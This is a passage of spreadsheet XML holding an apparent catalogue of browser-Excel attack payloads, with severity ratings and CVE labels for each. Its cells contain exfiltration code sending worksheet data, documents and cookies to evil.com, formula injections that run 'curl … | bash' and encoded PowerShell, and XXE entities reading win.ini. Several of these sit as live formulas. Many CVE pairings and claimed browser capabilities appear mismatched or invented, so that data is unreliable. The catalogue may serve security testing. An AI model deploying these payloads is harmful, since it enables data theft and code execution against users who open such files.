      <c r="J28" t="inlineStr">
        <is>
          <t>Firefox processes legacy ActiveX controls in Excel files</t>
        </is>
      </c>
      <c r="K28" t="inlineStr">
        <is>
          <t>Legacy .xls format enables older ActiveX controls</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" t="inlineStr">
        <is>
          <t>excel_browser_0022</t>
        </is>
      </c>
      <c r="B29" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C29" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D29" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E29" t="inlineStr">
        <is>
          <t>power_query_injection</t>
        </is>
      </c>
      <c r="F29" t="inlineStr">
        <is>
          <t>let Source = Web.Contents("https://evil.com/api?query="&amp;Text.From(Excel.CurrentWorkbook(){[Name="Sheet1"]}[Content]{0}[Column1])) in Source</t>
        </is>
      </c>
      <c r="G29" t="inlineStr">
        <is>
          <t>Chrome Excel Power Query injection for data exfiltration via web service</t>
        </is>
      </c>
      <c r="H29" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I29" t="inlineStr">
        <is>
          <t>CVE-2021-28449, CVE-2021-31174</t>
        </is>
      </c>
      <c r="J29" t="inlineStr">
        <is>
          <t>Chrome Excel Power Query can make external HTTP requests with worksheet data</t>
        </is>
      </c>
      <c r="K29" t="inlineStr">
        <is>
          <t>Power Query appears as legitimate data connection, worksheet data exfiltration</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" t="inlineStr">
        <is>
          <t>excel_browser_0023</t>
        </is>
      </c>
      <c r="B30" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C30" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D30" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E30" t="inlineStr">
        <is>
          <t>office_js_api_abuse</t>
        </is>
      </c>
      <c r="F30" t="inlineStr">
        <is>
          <t>Office.context.document.getFileAsync(Office.FileType.Compressed, function(result) { fetch('https://evil.com/exfil', {method: 'POST', body: result.value.file}); });</t>
        </is>
      </c>
      <c r="G30" t="inlineStr">
        <is>
          <t>Office 365 Web Excel Office.js API abuse for document exfiltration</t>
        </is>
      </c>
      <c r="H30" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I30" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42321</t>
        </is>
      </c>
      <c r="J30" t="inlineStr">
        <is>
          <t>Office 365 web Excel supports Office.js APIs for file operations</t>
        </is>
      </c>
      <c r="K30" t="inlineStr">
        <is>
          <t>Office.js appears as legitimate add-in functionality, document data theft</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" t="inlineStr">
        <is>
          <t>excel_browser_0024</t>
        </is>
      </c>
      <c r="B31" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C31" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D31" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E31" t="inlineStr">
        <is>
          <t>importrange_abuse</t>
        </is>
      </c>
      <c r="F31">
        <f>IMPORTRANGE("https://docs.google.com/spreadsheets/d/evil_sheet_id", "Sheet1!A:Z")</f>
        <v/>
      </c>
      <c r="G31" t="inlineStr">
        <is>
          <t>Google Sheets IMPORTRANGE function abuse for cross-sheet data access</t>
        </is>
      </c>
      <c r="H31" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I31" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30506</t>
        </is>
      </c>
      <c r="J31" t="inlineStr">
        <is>
          <t>Google Sheets IMPORTRANGE can access external spreadsheet data</t>
        </is>
      </c>
      <c r="K31" t="inlineStr">
        <is>
          <t>IMPORTRANGE appears as data import, cross-sheet permissions abuse</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" t="inlineStr">
        <is>
          <t>excel_browser_0025</t>
        </is>
      </c>
      <c r="B32" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C32" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D32" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E32" t="inlineStr">
        <is>
          <t>binary_xml_xxe</t>
        </is>
      </c>
      <c r="F32" t="inlineStr">
        <is>
          <t>Binary XML with XXE: &lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"&gt;]&gt;</t>
        </is>
      </c>
      <c r="G32" t="inlineStr">
        <is>
          <t>Edge Excel binary XML XXE for Windows configuration file disclosure</t>
        </is>
      </c>
      <c r="H32" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I32" t="inlineStr">
        <is>
          <t>CVE-2020-1563, CVE-2021-31939</t>
        </is>
      </c>
      <c r="J32" t="inlineStr">
        <is>
          <t>Edge processes binary XML in xlsb files, XXE can read system files</t>
        </is>
      </c>
      <c r="K32" t="inlineStr">
        <is>
          <t>Binary format masks XML content, system file disclosure</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" t="inlineStr">
        <is>
          <t>excel_browser_0026</t>
        </is>
      </c>
      <c r="B33" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C33" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D33" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E33" t="inlineStr">
        <is>
          <t>firefox_webextension_abuse</t>
        </is>
      </c>
      <c r="F33" t="inlineStr">
        <is>
          <t>browser.tabs.executeScript({code: "window.location='https://evil.com/steal?data='+btoa(document.body.innerHTML)"});</t>
        </is>
      </c>
      <c r="G33" t="inlineStr">
        <is>
          <t>Firefox Excel web extension API abuse for tab manipulation and data theft</t>
        </is>
      </c>
      <c r="H33" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I33" t="inlineStr">
        <is>
          <t>CVE-2019-11707, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J33" t="inlineStr">
        <is>
          <t>Firefox web extensions can manipulate tabs when Excel files trigger extension</t>
        </is>
      </c>
      <c r="K33" t="inlineStr">
        <is>
          <t>Web extension appears legitimate, cross-tab data access</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" t="inlineStr">
        <is>
          <t>excel_browser_0027</t>
        </is>
      </c>
      <c r="B34" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C34" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D34" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E34" t="inlineStr">
        <is>
          <t>applescript_bridge</t>
        </is>
      </c>
      <c r="F34">
        <f>AppleScript|'tell application "Terminal" to do script "curl https://evil.com/payload.sh | bash"'!A1</f>
        <v/>
      </c>
      <c r="G34" t="inlineStr">
        <is>
          <t>Safari Excel AppleScript bridge for macOS command execution</t>
        </is>
      </c>
      <c r="H34" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I34" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715</t>
        </is>
      </c>
      <c r="J34" t="inlineStr">
        <is>
          <t>Safari Excel can execute AppleScript commands on macOS</t>
        </is>
      </c>
      <c r="K34" t="inlineStr">
        <is>
          <t>AppleScript appears as macOS automation, Terminal command execution</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" t="inlineStr">
        <is>
          <t>excel_browser_0028</t>
        </is>
      </c>
      <c r="B35" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C35" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D35" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E35" t="inlineStr">
        <is>
          <t>http_request_library</t>
        </is>
      </c>
      <c r="F35" t="inlineStr">
        <is>
          <t>Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "POST", "https://evil.com/exfil", False
http.Send ActiveSheet.UsedRange.Value</t>
        </is>
      </c>
      <c r="G35" t="inlineStr">
        <is>
          <t>Chrome Excel macro HTTP library abuse for worksheet data exfiltration</t>
        </is>
      </c>
      <c r="H35" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I35" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J35" t="inlineStr">
        <is>
          <t>Chrome Excel macros can use XMLHTTP for external communications</t>
        </is>
      </c>
      <c r="K35" t="inlineStr">
        <is>
          <t>XMLHTTP appears as web service integration, worksheet data theft</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" t="inlineStr">
        <is>
          <t>excel_browser_0029</t>
        </is>
      </c>
      <c r="B36" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C36" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D36" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E36" t="inlineStr">
        <is>
          <t>binary_macro_storage</t>
        </is>
      </c>
      <c r="F36" t="inlineStr">
        <is>
          <t>Binary encoded VBA macro: CreateObject("Wscript.Shell").Run "cmd /c &lt;payload&gt;"</t>
        </is>
      </c>
      <c r="G36" t="inlineStr">
        <is>
          <t>Office 365 Web Excel binary macro storage for AV evasion</t>
        </is>
      </c>
      <c r="H36" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I36" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42292</t>
        </is>
      </c>
      <c r="J36" t="inlineStr">
        <is>
          <t>Office 365 web processes binary macro storage in xlsb format</t>
        </is>
      </c>
      <c r="K36" t="inlineStr">
        <is>
          <t>Binary encoding evades text-based detection, command execution</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" t="inlineStr">
        <is>
          <t>excel_browser_0030</t>
        </is>
      </c>
      <c r="B37" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C37" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D37" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E37" t="inlineStr">
        <is>
          <t>powershell_encoded_payload</t>
        </is>
      </c>
      <c r="F37">
        <f>cmd|'/c powershell -EncodedCommand &lt;base64_encoded_payload&gt;'!A1</f>
        <v/>
      </c>
      <c r="G37" t="inlineStr">
        <is>
          <t>Edge CSV injection with PowerShell encoded command for AV bypass</t>
        </is>
      </c>
      <c r="H37" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I37" t="inlineStr">
        <is>
          <t>CVE-2020-1464, CVE-2021-31955</t>
        </is>
      </c>
      <c r="J37" t="inlineStr">
        <is>
          <t>Edge processes CSV formulas, PowerShell encoded commands bypass detection</t>
        </is>
      </c>
      <c r="K37" t="inlineStr">
        <is>
          <t>Base64 encoding obfuscates payload, PowerShell execution</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" t="inlineStr">
        <is>
          <t>excel_browser_0031</t>
        </is>
      </c>
      <c r="B38" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C38" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D38" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E38" t="inlineStr">
        <is>
          <t>indirect_cell_reference</t>
        </is>
      </c>
      <c r="F38">
        <f>INDIRECT("R"&amp;ROW()&amp;"C"&amp;COLUMN()+1,FALSE)&amp;"=cmd|'/c calc'!A1"</f>
        <v/>
      </c>
      <c r="G38" t="inlineStr">
        <is>
          <t>Firefox Excel INDIRECT function abuse for dynamic formula construction</t>
        </is>
      </c>
      <c r="H38" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I38" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026</t>
        </is>
      </c>
      <c r="J38" t="inlineStr">
        <is>
          <t>Firefox Excel INDIRECT function can construct formulas dynamically</t>
        </is>
      </c>
      <c r="K38" t="inlineStr">
        <is>
          <t>Dynamic formula construction evades static analysis</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" t="inlineStr">
        <is>
          <t>excel_browser_0032</t>
        </is>
      </c>
      <c r="B39" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C39" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D39" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E39" t="inlineStr">
        <is>
          <t>google_finance_abuse</t>
        </is>
      </c>
      <c r="F39">
        <f>GOOGLEFINANCE("NASDAQ:"&amp;CONCATENATE("G","O","O","G")&amp;"L")&amp;WEBSERVICE("https://evil.com/exfil?data="&amp;A1)</f>
        <v/>
      </c>
      <c r="G39" t="inlineStr">
        <is>
          <t>Google Sheets GOOGLEFINANCE and WEBSERVICE chaining for data exfiltration</t>
        </is>
      </c>
      <c r="H39" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I39" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30563</t>
        </is>
      </c>
      <c r="J39" t="inlineStr">
        <is>
          <t>Google Sheets allows function chaining for complex data operations</t>
        </is>
      </c>
      <c r="K39" t="inlineStr">
        <is>
          <t>Legitimate-looking financial functions mask data exfiltration</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" t="inlineStr">
        <is>
          <t>excel_browser_0033</t>
        </is>
      </c>
      <c r="B40" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C40" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D40" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E40" t="inlineStr">
        <is>
          <t>nsapplescript_execution</t>
        </is>
      </c>
      <c r="F40" t="inlineStr">
        <is>
          <t>Set script = CreateObject("AppleScript")
script.ExecuteStatement "do shell script \"curl https://evil.com/payload.sh | bash\""</t>
        </is>
      </c>
      <c r="G40" t="inlineStr">
        <is>
          <t>Safari Excel NSAppleScript execution for macOS shell command injection</t>
        </is>
      </c>
      <c r="H40" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I40" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715</t>
        </is>
      </c>
      <c r="J40" t="inlineStr">
        <is>
          <t>Safari Excel macros can execute NSAppleScript for system commands</t>
        </is>
      </c>
      <c r="K40" t="inlineStr">
        <is>
          <t>NSAppleScript appears as macOS automation, shell injection</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" t="inlineStr">
        <is>
          <t>excel_browser_0034</t>
        </is>
      </c>
      <c r="B41" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C41" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D41" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E41" t="inlineStr">
        <is>
          <t>binary_xml_parameter_entity</t>
        </is>
      </c>
      <c r="F41" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE root [&lt;!ENTITY % param SYSTEM "https://evil.com/dtd"&gt;%param;]&gt;</t>
        </is>
      </c>
      <c r="G41" t="inlineStr">
        <is>
          <t>Chrome Excel binary XML parameter entity for remote DTD loading</t>
        </is>
      </c>
      <c r="H41" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I41" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2020-6418</t>
        </is>
      </c>
      <c r="J41" t="inlineStr">
        <is>
          <t>Chrome processes binary XML with parameter entities for remote DTD</t>
        </is>
      </c>
      <c r="K41" t="inlineStr">
        <is>
          <t>Parameter entities enable remote DTD loading and XXE chaining</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" t="inlineStr">
        <is>
          <t>excel_browser_0035</t>
        </is>
      </c>
      <c r="B42" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C42" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D42" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E42" t="inlineStr">
        <is>
          <t>office365_power_automate</t>
        </is>
      </c>
      <c r="F42">
        <f>CONCATENATE("https://prod-","xx",".westus.logic.azure.com:443/workflows/","evil_workflow_id","/triggers/manual/paths/invoke?api-version=2016-10-01&amp;sp=%2Ftriggers%2Fmanual%2Frun&amp;sv=1.0&amp;sig=","evil_signature")</f>
        <v/>
      </c>
      <c r="G42" t="inlineStr">
        <is>
          <t>Office 365 Web CSV injection targeting Power Automate webhook for data exfiltration</t>
        </is>
      </c>
      <c r="H42" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I42" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42321</t>
        </is>
      </c>
      <c r="J42" t="inlineStr">
        <is>
          <t>Office 365 web can process CSV formulas that trigger Power Automate workflows</t>
        </is>
      </c>
      <c r="K42" t="inlineStr">
        <is>
          <t>Power Automate webhooks appear as legitimate business automation</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" t="inlineStr">
        <is>
          <t>excel_browser_0036</t>
        </is>
      </c>
      <c r="B43" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C43" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D43" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E43" t="inlineStr">
        <is>
          <t>edge_webview2_abuse</t>
        </is>
      </c>
      <c r="F43" t="inlineStr">
        <is>
          <t>window.chrome.webview.postMessage({action: 'navigate', url: 'https://evil.com/harvest?data=' + btoa(document.documentElement.outerHTML)});</t>
        </is>
      </c>
      <c r="G43" t="inlineStr">
        <is>
          <t>Edge Excel WebView2 message passing for DOM access and data harvesting</t>
        </is>
      </c>
      <c r="H43" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I43" t="inlineStr">
        <is>
          <t>CVE-2020-1464, CVE-2021-31955</t>
        </is>
      </c>
      <c r="J43" t="inlineStr">
        <is>
          <t>Edge WebView2 in Excel can use postMessage for host communication</t>
        </is>
      </c>
      <c r="K43" t="inlineStr">
        <is>
          <t>WebView2 postMessage appears as legitimate host-web communication</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" t="inlineStr">
        <is>
          <t>excel_browser_0037</t>
        </is>
      </c>
      <c r="B44" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C44" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D44" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E44" t="inlineStr">
        <is>
          <t>firefox_xpcom_abuse</t>
        </is>
      </c>
      <c r="F44">
        <f>CALL("xpcom","@mozilla.org/file/local;1","createInstance","nsILocalFile")|A1</f>
        <v/>
      </c>
      <c r="G44" t="inlineStr">
        <is>
          <t>Firefox Excel XPCOM interface abuse for file system access</t>
        </is>
      </c>
      <c r="H44" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I44" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026</t>
        </is>
      </c>
      <c r="J44" t="inlineStr">
        <is>
          <t>Firefox legacy Excel support can access XPCOM interfaces</t>
        </is>
      </c>
      <c r="K44" t="inlineStr">
        <is>
          <t>XPCOM appears as Firefox internal API, file system access</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" t="inlineStr">
        <is>
          <t>excel_browser_0038</t>
        </is>
      </c>
      <c r="B45" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C45" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D45" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E45" t="inlineStr">
        <is>
          <t>safari_url_scheme_abuse</t>
        </is>
      </c>
      <c r="F45" t="inlineStr">
        <is>
          <t>safari-resource://com.apple.Safari/SafariHTML.html?url=https://evil.com/payload.html</t>
        </is>
      </c>
      <c r="G45" t="inlineStr">
        <is>
          <t>Safari Excel URL scheme abuse for custom protocol handling and payload delivery</t>
        </is>
      </c>
      <c r="H45" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I45" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715</t>
        </is>
      </c>
      <c r="J45" t="inlineStr">
        <is>
          <t>Safari Excel can process custom URL schemes for resource loading</t>
        </is>
      </c>
      <c r="K45" t="inlineStr">
        <is>
          <t>Custom URL schemes bypass standard URL filtering</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" t="inlineStr">
        <is>
          <t>excel_browser_0039</t>
        </is>
      </c>
      <c r="B46" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C46" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D46" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E46" t="inlineStr">
        <is>
          <t>chrome_native_messaging</t>
        </is>
      </c>
      <c r="F46" t="inlineStr">
        <is>
          <t>chrome.runtime.connectNative('com.evil.host').postMessage({cmd: 'exec', payload: 'calc.exe'});</t>
        </is>
      </c>
      <c r="G46" t="inlineStr">
        <is>
          <t>Chrome Excel native messaging abuse for host application communication</t>
        </is>
      </c>
      <c r="H46" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I46" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J46" t="inlineStr">
        <is>
          <t>Chrome Excel can use native messaging for external application communication</t>
        </is>
      </c>
      <c r="K46" t="inlineStr">
        <is>
          <t>Native messaging appears as legitimate browser extension functionality</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" t="inlineStr">
        <is>
          <t>excel_browser_0040</t>
        </is>
      </c>
      <c r="B47" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C47" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D47" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E47" t="inlineStr">
        <is>
          <t>azure_blob_xxe</t>
        </is>
      </c>
      <c r="F47" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM "https://evilstorage.blob.core.windows.net/container/payload.xml"&gt;]&gt;&lt;root&gt;&amp;xxe;&lt;/root&gt;</t>
        </is>
      </c>
      <c r="G47" t="inlineStr">
        <is>
          <t>Office 365 Web Excel XXE targeting Azure Blob Storage for payload retrieval</t>
        </is>
      </c>
      <c r="H47" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I47" t="inlineStr">
        <is>
          <t>CVE-2019-0540, CVE-2021-31199</t>
        </is>
      </c>
      <c r="J47" t="inlineStr">
        <is>
          <t>Office 365 web XXE can access Azure Blob Storage with proper credentials</t>
        </is>
      </c>
      <c r="K47" t="inlineStr">
        <is>
          <t>Azure Blob Storage appears as legitimate cloud storage, trusted domain</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" t="inlineStr">
        <is>
          <t>excel_browser_0041</t>
        </is>
      </c>
      <c r="B48" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C48" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D48" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E48" t="inlineStr">
        <is>
          <t>google_apps_script_trigger</t>
        </is>
      </c>
      <c r="F48">
        <f>CONCATENATE("https://script.google.com/macros/s/","evil_script_id","/exec?data=",ENCODEURL(A1))</f>
        <v/>
      </c>
      <c r="G48" t="inlineStr">
        <is>
          <t>Google Sheets CSV injection triggering Google Apps Script for data processing</t>
        </is>
      </c>
      <c r="H48" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I48" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30506</t>
        </is>
      </c>
      <c r="J48" t="inlineStr">
        <is>
          <t>Google Sheets can trigger Google Apps Script via URL formulas</t>
        </is>
      </c>
      <c r="K48" t="inlineStr">
        <is>
          <t>Google Apps Script appears as legitimate automation, data exfiltration</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" t="inlineStr">
        <is>
          <t>excel_browser_0042</t>
        </is>
      </c>
      <c r="B49" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C49" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D49" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E49" t="inlineStr">
        <is>
          <t>firefox_addon_sdk_abuse</t>
        </is>
      </c>
      <c r="F49" t="inlineStr">
        <is>
          <t>const {Cc, Ci} = require('chrome');
Cc['@mozilla.org/observer-service;1'].getService(Ci.nsIObserverService).notifyObservers(null, 'http-on-modify-request', 'https://evil.com');</t>
        </is>
      </c>
      <c r="G49" t="inlineStr">
        <is>
          <t>Firefox Excel Add-on SDK abuse for HTTP request interception and modification</t>
        </is>
      </c>
      <c r="H49" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I49" t="inlineStr">
        <is>
          <t>CVE-2019-11707, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J49" t="inlineStr">
        <is>
          <t>Firefox Add-on SDK can intercept and modify HTTP requests</t>
        </is>
      </c>
      <c r="K49" t="inlineStr">
        <is>
          <t>Add-on SDK appears as legitimate browser extension functionality</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" t="inlineStr">
        <is>
          <t>excel_browser_0043</t>
        </is>
      </c>
      <c r="B50" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C50" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D50" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E50" t="inlineStr">
        <is>
          <t>edge_legacy_activex</t>
        </is>
      </c>
      <c r="F50">
        <f>CreateObject("Shell.Application").ShellExecute("powershell", "-enc &lt;base64_payload&gt;", "", "open", 0)</f>
        <v/>
      </c>
      <c r="G50" t="inlineStr">
        <is>
          <t>Edge Excel legacy ActiveX Shell.Application abuse for PowerShell execution</t>
        </is>
      </c>
      <c r="H50" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I50" t="inlineStr">
        <is>
          <t>CVE-2020-1464, CVE-2021-31955</t>
        </is>
      </c>
      <c r="J50" t="inlineStr">
        <is>
          <t>Edge legacy mode supports ActiveX Shell.Application for system commands</t>
        </is>
      </c>
      <c r="K50" t="inlineStr">
        <is>
          <t>Shell.Application appears as Windows shell integration, PowerShell execution</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" t="inlineStr">
        <is>
          <t>excel_browser_0044</t>
        </is>
      </c>
      <c r="B51" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C51" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D51" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E51" t="inlineStr">
        <is>
          <t>chrome_devtools_protocol</t>
        </is>
      </c>
      <c r="F51" t="inlineStr">
        <is>
          <t>{"id": 1, "method": "Runtime.evaluate", "params": {"expression": "fetch('https://evil.com/exfil', {method: 'POST', body: JSON.stringify(document.cookie)})"}}</t>
        </is>
      </c>
      <c r="G51" t="inlineStr">
        <is>
          <t>Chrome Excel DevTools Protocol abuse for runtime JavaScript execution</t>
        </is>
      </c>
      <c r="H51" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I51" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J51" t="inlineStr">
        <is>
          <t>Chrome DevTools Protocol can execute JavaScript in Excel web context</t>
        </is>
      </c>
      <c r="K51" t="inlineStr">
        <is>
          <t>DevTools Protocol appears as debugging functionality, JavaScript execution</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" t="inlineStr">
        <is>
          <t>excel_browser_0045</t>
        </is>
      </c>
      <c r="B52" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C52" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D52" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E52" t="inlineStr">
        <is>
          <t>sharepoint_rest_api_abuse</t>
        </is>
      </c>
      <c r="F52" t="inlineStr">
        <is>
